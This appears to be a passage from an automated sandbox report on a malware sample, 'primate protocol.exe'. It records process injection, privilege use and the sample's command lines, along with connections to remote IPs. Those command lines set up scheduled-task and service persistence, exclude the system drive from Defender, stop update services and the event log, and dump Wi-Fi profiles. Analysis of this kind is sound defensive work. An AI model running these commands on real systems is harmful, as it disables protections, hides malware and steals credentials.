N/A N/A C:\Windows\System32\dllhost.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\systemprocess.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\CompPkg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\CompPkg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\host.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\dialer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\svchost.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\systemprocess.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1484 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1484 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1484 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1484 wrote to memory of 1444 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1484 wrote to memory of 1444 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1484 wrote to memory of 1444 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1484 wrote to memory of 5768 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\systemprocess.exe
PID 1484 wrote to memory of 5768 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\systemprocess.exe
PID 1484 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\host.exe
PID 1484 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\host.exe
PID 1484 wrote to memory of 3076 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\CompPkg.exe
PID 1484 wrote to memory of 3076 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\CompPkg.exe
PID 5768 wrote to memory of 3340 N/A C:\Windows\systemprocess.exe C:\Windows\SYSTEM32\schtasks.exe
PID 5768 wrote to memory of 3340 N/A C:\Windows\systemprocess.exe C:\Windows\SYSTEM32\schtasks.exe
PID 3076 wrote to memory of 4768 N/A C:\Windows\CompPkg.exe C:\Windows\System32\schtasks.exe
PID 3076 wrote to memory of 4768 N/A C:\Windows\CompPkg.exe C:\Windows\System32\schtasks.exe
PID 5156 wrote to memory of 5776 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\CompPkg.exe
PID 5156 wrote to memory of 5776 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\CompPkg.exe
PID 5768 wrote to memory of 3128 N/A C:\Windows\systemprocess.exe C:\Windows\SYSTEM32\netsh.exe
PID 5768 wrote to memory of 3128 N/A C:\Windows\systemprocess.exe C:\Windows\SYSTEM32\netsh.exe
PID 5768 wrote to memory of 5664 N/A C:\Windows\systemprocess.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5768 wrote to memory of 5664 N/A C:\Windows\systemprocess.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3016 wrote to memory of 848 N/A C:\Windows\host.exe C:\Windows\system32\dialer.exe
PID 3016 wrote to memory of 848 N/A C:\Windows\host.exe C:\Windows\system32\dialer.exe
PID 3016 wrote to memory of 848 N/A C:\Windows\host.exe C:\Windows\system32\dialer.exe
PID 3016 wrote to memory of 848 N/A C:\Windows\host.exe C:\Windows\system32\dialer.exe
PID 3016 wrote to memory of 848 N/A C:\Windows\host.exe C:\Windows\system32\dialer.exe
PID 3016 wrote to memory of 848 N/A C:\Windows\host.exe C:\Windows\system32\dialer.exe
PID 1480 wrote to memory of 5008 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1480 wrote to memory of 5008 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1480 wrote to memory of 5008 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1480 wrote to memory of 5008 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1480 wrote to memory of 5008 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1480 wrote to memory of 5008 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1480 wrote to memory of 5268 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1480 wrote to memory of 5268 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1480 wrote to memory of 5268 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1480 wrote to memory of 5268 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1480 wrote to memory of 5268 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1480 wrote to memory of 5268 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1480 wrote to memory of 5268 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1480 wrote to memory of 5268 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1480 wrote to memory of 5268 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1480 wrote to memory of 2336 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1480 wrote to memory of 2336 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1480 wrote to memory of 2336 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1480 wrote to memory of 2336 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1480 wrote to memory of 2336 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 5316 wrote to memory of 4636 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 5316 wrote to memory of 4636 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 5316 wrote to memory of 4636 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 5316 wrote to memory of 4636 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 5316 wrote to memory of 4636 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 5316 wrote to memory of 4636 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 5316 wrote to memory of 4636 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 5316 wrote to memory of 4636 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 908 wrote to memory of 4396 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 908 wrote to memory of 4396 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 908 wrote to memory of 4396 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 908 wrote to memory of 4396 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 908 wrote to memory of 4396 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 908 wrote to memory of 4396 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 908 wrote to memory of 4396 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 908 wrote to memory of 4396 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Users\Admin\AppData\Local\Temp\primate protocol.exe

"C:\Users\Admin\AppData\Local\Temp\primate protocol.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAawBtACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGUAZQBmACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASABFAEEARABTAEUAVAAgAE4ATwBUACAARABFAFQARQBDAFQARQBEACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwBuAGYAZwAjAD4A"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AZwBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAbgBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAYgBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGoAawBmACMAPgA="

C:\Windows\systemprocess.exe

"C:\Windows\systemprocess.exe"

C:\Windows\host.exe

"C:\Windows\host.exe"

C:\Windows\CompPkg.exe

"C:\Windows\CompPkg.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "HOST" /sc ONLOGON /tr "C:\Windows\systemprocess.exe" /rl HIGHEST /f

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "CompPkg" /tr "C:\Users\Admin\AppData\Roaming\CompPkg.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\CompPkg.exe

C:\Users\Admin\AppData\Roaming\CompPkg.exe

C:\Users\Admin\AppData\Roaming\CompPkg.exe

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\SYSTEM32\netsh.exe

"netsh" wlan show profiles

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "$([System.Environment]::GetEnvironmentVariable('SystemDrive'))\"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "PROCESS HOST"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "PROCESS HOST" binpath= "C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "PROCESS HOST"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE


C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe

C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

dialer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE


C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{09f4a227-cef4-4b5d-ba7b-580721731d4e}

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{c3f2fd93-4d00-463c-bd0a-7536c6c18483}

C:\Users\Admin\AppData\Roaming\CompPkg.exe

C:\Users\Admin\AppData\Roaming\CompPkg.exe

C:\Users\Admin\AppData\Roaming\CompPkg.exe

C:\Users\Admin\AppData\Roaming\CompPkg.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 appengine.google.com udp
US 174.61.118.194:4872 tcp
DE 195.201.57.90:443 ipwho.is tcp
US 73.179.34.234:4872 tcp
US 174.61.118.194:4872 tcp

Files
